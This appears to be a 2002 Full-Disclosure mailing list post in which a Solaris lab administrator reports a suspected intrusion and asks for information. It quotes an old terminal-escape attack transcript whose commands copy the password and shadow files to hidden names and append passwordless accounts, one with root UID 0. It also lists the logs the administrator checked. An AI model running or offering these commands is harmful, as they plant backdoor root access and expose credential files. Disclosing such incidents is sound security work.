memetic-engineer@hushmail.com wrote: http://lists.netsys.com/pipermail/full-disclosure/2002-August/001073.html "#old solaris bug die hard.....something similar, but not quite. Have you audited your Solstice #products recently? lit_tty was nothing. M^ got lost again ( agent.lspitzner.added.to.meme156) cp /etc/passwd /etc/.tp;" I assumed he was speaking of a variation of this old thing; > # cp /etc/passwd /etc/.tp; ^Mcp /etc/shadow /etc/.ts; echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd; echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd; echo "r::10891::::::" >> /etc/shadow; echo "re::6445::::::" >> /etc/shadow; : not found # ^M: not found # ^M: not found # ^M: not found # ^M: not found # ^M: not found # who; rsides console WED Aug 15 2002 21:09 ^M: not found # exit; and after converting the hex saw that it was an exact replica. To make a long story short, I woke up yesterday to find this in my home directory : ./MeMe156/agent.agency.08.14.02.2348/added .agent.sol after looking through ; /var/adm/messages /var/adm/syslog to no avail, I used what I thought to be a clever script that logs auth.notice messages. NOTHING /var/log/utmp; /var/log/utmpx /var/log/wtmp; /var/log/wtmpx /var/log/syslog nothing. But then /var/log/sulog showed me this; SU 03/31 12:52 + pts/0 <userid>-root and /var/adm/messages revealed this Mar 31 12:48:41 ***.***.***.*** unix: rebooting... almost convenient that it was there at all. If anyone else has any information remotely related please respond. I administer a private lab running 2 Sun LX50's involved in active Ionospheric research and HF analysis. "In building a machine we are so intent upon our purpose that we forget that we are investing that machine with creative power...it can overgrow us in an invisible way...they are the dwelling-places of divine powers that may destroy us." -C.G. Jung This message was sent from http://australia.edu Check out the new international site at http://australia.edu/international
